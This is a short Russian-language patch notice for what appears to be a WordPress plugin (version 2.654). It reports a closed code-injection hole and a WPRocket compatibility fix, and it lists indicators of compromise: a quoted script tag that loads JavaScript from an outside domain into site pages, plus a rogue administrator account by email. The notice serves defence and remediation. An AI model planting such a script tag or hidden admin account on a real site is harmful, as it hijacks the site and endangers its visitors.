Патч готов - v2.654
1. Закрыта дыра в коде, которая позволяла внедрять вредоносный код на ваш сайт.
2. Исправлена совместимость в WPRocket, с его функцией отложенных скриптов.
Итак! Если у вас на сайте был замечен код в разделе Header и footer:
<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>
Проверьте появился ли новый администратор с почтой: system@wordpress.local
___________________________________
Если это ваш случай, то я настоятельно рекомендую восстановить полный бекап сайта за вчерашний день или ранее!
Если по какой-то причине вы этого не хотите делать или не можете, то удалите вредоносный код из раздела Header и footer, затем удалите нового пользователя из админки.
После этого обновите плагин до версии 2.654!